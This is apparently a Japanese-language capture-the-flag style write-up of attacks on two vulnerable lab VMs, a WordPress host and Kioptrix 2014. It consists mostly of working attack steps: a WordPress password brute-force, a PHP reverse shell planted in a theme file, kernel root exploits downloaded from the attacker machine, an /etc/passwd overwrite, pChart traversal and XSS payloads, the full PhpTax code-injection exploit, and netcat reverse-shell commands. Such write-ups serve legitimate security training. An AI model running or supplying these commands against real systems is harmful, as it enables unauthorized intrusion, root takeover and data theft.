 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:49 <==========================================================================================================================================================> (20900 / 20900) 100.00% Time: 00:00:49
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] twentyfifteen
 | Location: http://vtcsec/secret/wp-content/themes/twentyfifteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 1.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.9'

[+] twentyseventeen
 | Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.4'

[+] twentysixteen
 | Location: http://vtcsec/secret/wp-content/themes/twentysixteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://vtcsec/secret/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentysixteen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://vtcsec/secret/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May  4 07:24:53 2020
[+] Requests Done: 20932
[+] Cached Requests: 47
[+] Data Sent: 4.849 MB
[+] Data Received: 3.127 MB
[+] Memory used: 264.789 MB
[+] Elapsed time: 00:01:06

とりあえずadminのパスワードを探す。

(snip)

[+] Performing password attack on Wp Login against 1 user/s
Trying admin / loulou Time: 00:00:22 <> (1331 / 14344391)  0.00%  ETA: 67:32:Trying admin / candy1 Time: 00:00:22 <> (1333 / 14344391)  0.00%  ETA: 67:28:            Trying admin / tequieromucho Time: 00:00:23 <> (1400 / 14344391)  0.00%  ETA: 67:53Trying admin / liverpoolfc Time: 00:00:30 <> (1784 / 14344391)  0.01%  ETA: 67:56:1Trying admin / babykohTrying admin / admin Time: 00:05:59 <=========================================> (19820 / 19820) 100.00% Time: 00:05:59
[SUCCESS] - admin / admin                                                                                             

[!] Valid Combinations Found:
 | Username: admin, Password: admin
(snip)

adminはデフォルトで使われてたんか。
ということでadmin/adminでログイン。
単純なファイルアップロードのやり方が分からなかったので、既存ファイルの書き換えでいく。
自分の場合は「Appearance」の「Editor」を選択して、Thema Filesのうちserach.phpを選択。
最後の方に kali linuxの/usr/share/webshells/php/php-reverse-shell.phpを自分用に書き換えたやつを追加。
これでwordpressページで「serach」ボタンを押すとreverse-shellするようになった。
「404.php」を書き換えても良かったが、アクセスするパスが分からなった。

待ちながら押したら来る

# nc -nlvp 8080
(push [search])
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 09:07:25 up  7:28,  0 users,  load average: 0.00, 0.00, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

after shell getchu

victim

$ uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

attacker

# searchsploit linux ubuntu 16.04
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalatio | exploits/linux/local/45010.c
(snip)
# cp /usr/share/exploitdb/exploits/linux/local/45010.c 45010.c
# python -m SimpleHTTPServer 80

victim

$ cd /tmp
$ wget 10.10.10.3/45010.c
--2020-05-04 09:01:46--  http://10.10.10.3/45010.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/plain]
Saving to: '45010.c'

     0K .......... ...                                        100% 14.6M=0.001s

2020-05-04 09:01:46 (14.6 MB/s) - '45010.c' saved [13728/13728]

$ gcc 45010.c
$ ./a.out
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Kernel exploitは複数ありそうだけど、一番絶対ハマりそうなやつを選択した。

privcheck

# cp /usr/bin/unix-privesc-check pric

権限チェックなんてやってくれるすごいプログラムがkali linuxにはあるらしくて使ってみた。
victimに送って動かす。

victim

$ ./pric detailed | grep WARNING
passwd: Permission denied.
Search the output below for the word 'WARNING'.  If you don't see it then
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
(snip)

何か色々止まらないので、一番上の面白そうなやつだけピックアップ
実は今回の環境「/etc/passwd」ファイルをrootでなくても書き換えられる。

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cp /etc/passwd /tmp/passwd
$ openssl passwd -1 password
$1$n.m2eSNO$znpjjJIvqy12UiYDL6G90/
$ echo "root:\$1\$7Y7rVxIM\$pZaXFk7OlTVsq3X2aMiAM.:0:0:root:/root:/bin/bash" > /etc/passwd
$ cat /tmp/passwd >> /etc/passwd
$ su -
su: must be run from a terminal
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@vtcsec:/tmp$ su -
su -
Password: password

root@vtcsec:~# id
id
uid=0(root) gid=0(root) groups=0(root)

終わり

• hydraよりwpscanの方がwordpress辞書攻撃早い?
• 404.phpは「http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php」にあった。

kioptrix 5(1-4)

何も考えずに、いつも通り仮想ディスクを作らないで後からIDEを追加しても起動しなかった。
元々配信されていたイメージ(.vmdk)に加えて、*fix.zipをダウンロードする。
*fix.zipに含まれている「*.vbox」からVMを作り、すでにセットされているストレージを消して改めて「*.vmdk」をIDEに追加する。
その後、*fix.zipに含まれていた画像にある通り、VMを起動した後の「mountroot>」プロンプトにてufs:/dev/ada0p2と入力すると起動した。

pentest

サービス調査

# nmap -p- 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:13 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00067s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 117.95 seconds
# nmap -p22,80,8080 -sV -version-all 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:17 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00072s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.64 seconds

nmap長いなぁ

気になりどころ

• port80 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
• port8080 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

詳細

80ポートのApacheからのアプローチ

# nikto -h 10.10.10.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.8
+ Target Hostname:    10.10.10.8
+ Target Port:        80
+ Start Time:         2020-04-30 08:21:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server may leak inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.3.8 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 8672 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2020-04-30 08:23:20 (GMT-4) (98 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.8

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Apr 30 08:29:52 2020
URL_BASE: http://10.10.10.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.8/ ----
+ http://10.10.10.8/cgi-bin/ (CODE:403|SIZE:210)                               
+ http://10.10.10.8/index.html (CODE:200|SIZE:152)                             
                                                                               
-----------------
END_TIME: Thu Apr 30 08:30:18 2020
DOWNLOADED: 4612 - FOUND: 2

「CVE-2002-0082」ってkioptrix1でもあった気がするが刺さるのか？
どうやらapacheのバージョンが一致しないので刺さらないらしい。
Apacheのバージョンにも何も無さそうだし、phpにも何も無いので詰みかぁ。
と思ったがindex.htmlのソースを見てみると

<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

「pChart2.1.3/index.php」?
アクセスする。
何か管理画面ぽいのが出てきた。

# searchsploit pChart 2.1
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilitie | exploits/php/webapps/31173.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
# cat /usr/share/exploitdb/exploits/php/webapps/31173.txt

# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.


[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.

Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.

色々あるみたいなのでやってみる。

firefoxから「http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd」へのアクセス

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

firefoxにて、↑のディレクトリトラバーサルと http://10.10.10.8/pChart2.1.3/examples/sandbox/script/session.php?<script>alert('XSS')</script>の発火を確認。
ディレクトリトラバーサルできるけど何見れば良いか分からん。
そういや、dirbで403出てるディレクトリあったのでそこにアクセス制御してそうな「.htaccess」とか「httpd.conf」でも見てみるか。
「.htaccess」は無いっぽい。
「 /etc/httpd/conf/httpd.conf」無い？
「/usr/local/apache2/conf/」でもない？
そういえばhttpd.confってOSごとに場所違った気がするので、今回FreeBSDだし違うとこにありそう。
推測参考 FreeBSDでApacheのインストールと起動 - Qiita
今回はApache 2.2.xなので、「/usr/local/etc/apache22/httpd.conf」と予測。

firefoxで「http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf」へアクセス

#
# This is the main Apache HTTP server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2> for detailed information.
# In particular, see 
# <URL:http://httpd.apache.org/docs/2.2/mod/directives.html>
# for a discussion of each configuration directive.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.  
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log"
# with ServerRoot set to "/usr/local" will be interpreted by the
# server as "/usr/local//var/log/foo_log".

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path.  If you point
# ServerRoot at a non-local disk, be sure to point the LockFile directive
# at a local disk.  If you wish to share the same ServerRoot for multiple
# httpd daemons, you will need to change at least LockFile and PidFile.
#
ServerRoot "/usr/local"

#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to 
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80
Listen 80
Listen 8080
(snip)
# "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/usr/local/www/apache22/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>

(snip)

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>



</VirtualHost>


Include etc/apache22/Includes/*.conf

ちゃんとありました。
やはり、httpd.confでアクセス制御をしていたようで。
port 8080もアクセス制御がされているようだけど、「Mozilla4_browser」だけアクセスできる？

# curl -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>

phptax?

# searchsploit phptax
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)               | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution            | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                           | exploits/php/webapps/21665.txt
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

metasploitは使いたくない。
でもphptaxのバージョン分からんし一か八か試すか？
しかし調べてみたところ、ver0.8が最新バージョンぽい？
そうだとしたらガバガバセキュリティだが、それにかける。
新しい方の、25849.txtでチャレンジ。

# cat /usr/share/exploitdb/exploits/php//webapps/25849.txt 
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /          
#  / XXXXXX /
# (________(            
#  `------'

# Exploit Title   : PhpTax File Manipulation(newvalue,field) Remote Code Execution
# Date            : 31 May 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://phptax.sourceforge.net/
# Software Link   : http://sourceforge.net/projects/phptax/
# Version         : 0.8
# Tested on       : Window and Linux


#####################################################
#VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION
#####################################################

#index.php

#LINE 32: fwrite fwrite($zz, "$_GET['newvalue']"); 
#LINE 31: $zz = fopen("./data/$field", "w"); 
#LINE  2: $field = $_GET['field']; 

#####################################################
#DESCRIPTION
#####################################################

#An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. 
#User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. 
#An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.


#####################################################
#EXPLOIT
#####################################################

<?php
 
$options = getopt('u:');
   
if(!isset($options['u']))
die("\n        Usage example: php exploit.php -u http://target.com/ \n"); 
   
$url     =  $options['u'];
$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";

$headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Content-Type: text/plain');
   
echo "        [+] Submitting request to: {$options['u']}\n";
   
$handle = curl_init();
   
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
   
$source = curl_exec($handle);
curl_close($handle);
   
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$url}/data/rce.php?cmd=id\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}
    
?>  

################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 
################################################################################################################

テキストだけかと思ったがちゃんとexploitついている。
「/phptax/index.php」の「2,31,32行目」に問題があるからexploitできるということか。
心配なので一応「usr/local/apache22//phptax/index.php」を確認。

# curl -vI -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080/phptax/index.php
*   Trying 10.10.10.8:8080...
* TCP_NODELAY set
* Connected to 10.10.10.8 (10.10.10.8) port 8080 (#0)
> GET /phptax/index.php HTTP/1.1
> Host: 10.10.10.8:8080
> Accept: */*
> User-Agent:Mozilla/4.0
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Date: Fri, 01 May 2020 03:44:35 GMT
Date: Fri, 01 May 2020 03:44:35 GMT
< Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
< X-Powered-By: PHP/5.3.8
X-Powered-By: PHP/5.3.8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Content-Type: text/html
Content-Type: text/html

< 
* Excess found: excess = 4131 url = /phptax/index.php (zero-length body)
* Connection #0 to host 10.10.10.8 left intact

firefoxで「http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/www/apache22/data2/phptax/index.php」へアクセス。
ファイルのありかは「httpd.conf」から分かる。

<?php
$field=$_GET[field];
(snip)

   if ($_GET[newvalue]) {
       $zz=fopen("./data/$field","w");
       fwrite($zz,"$_GET[newvalue]");
       fclose($zz);
   }

(snip)

ということで、「25849.txt」にならってexploitコードを書き換えれば良いと言うことか。

# cp /usr/share/exploitdb/exploits/php//webapps/25849.txt  phptax_exploit.php

このexploit使おうとしたら「curl_init()」知らないと怒られたので入れる。

# php -v
PHP 7.3.15-3 (cli) (built: Feb 23 2020 07:15:44) ( NTS )
(snip)
# apt install php7.3-curl

よっしゃこれでいけるか。

# php phptax_exploit.php -u http://10.10.10.8:8080/phptax
(snip)
#####################################################
#EXPLOIT
#####################################################

        [+] Submitting request to: http://10.10.10.8:8080/phptax
        [+] Exploit was unsuccessful.

はい。ダメです。
もう分からんからシェルスクリプトで書き直す。

# !/bin/sh
# ./phptax_exploit.sh

# phptax < ver 0.8 exploit

# vulncode in phptax/index.php
#     $field = $_GET['field']; in line 2
#     $zz = fopen("./data/$field", "w"); in line 31
#     fwrite fwrite($zz, "$_GET['newvalue']"); in line 32

target_site_to_phptax_index_path="$1" #example "http://10.10.10.8:8080/phptax/"
remote_code="$2" #example "id" URLencode!!!! space is "%20"
curl -vI -H "User-Agent:Mozilla/4.0" "$1/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E"
echo -e "\n"
curl -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/rce.php?cmd=$2"

適当に書いたから許して。
何故かここからreverse shellに苦戦。
結局上手くいったのは、reverse shellするphpを送り付けて実行するパターン。

php-reverse-shellがkaliの場合ある
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php


#### ここら辺変える
$VERSION = "1.0";
$ip = '10.10.10.3';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

window 1
# nc -nlvp 8080 < reverse.php

window 2
# ./phptax_exploit.sh http://10.10.10.8:8080/phptax nc%2010.10.10.3%208080%20%3E%20reverse.php%20\&

window 1
# nc -nlvp 443

windows 2
# curl -v -XGET -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/reverse.php

やっとシェル取れた。

$ id
uid=80(www) gid=80(www) groups=80(www)
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

FreeBSD 9.0は果たしてあるか。

# searchsploit FreeBSD 9.0
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation                       | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation                 | exploits/freebsd/local/26368.c
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

ちょうど良さそうなのがあるので、「28718.c」を試す。

# cp /usr/share/exploitdb/exploits/freebsd/local/28718.c freebsd9.0_priv.c

このプログラムは改行無いと怒られたので改行忘れずに。

victim
$ wget http://10.10.10.3/freebsd9.0_priv.c
wget: not found

マジか。
またncでファイルやりとりするか。

attacker
# nc -nlvp 8080 < freebsd9.0_priv.c

victim
$ cd /tmp
$ nc 10.10.10.3 8080 > priv.c
$ gcc priv.c
$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
$ cd /root  
$ ls
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log
$ cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

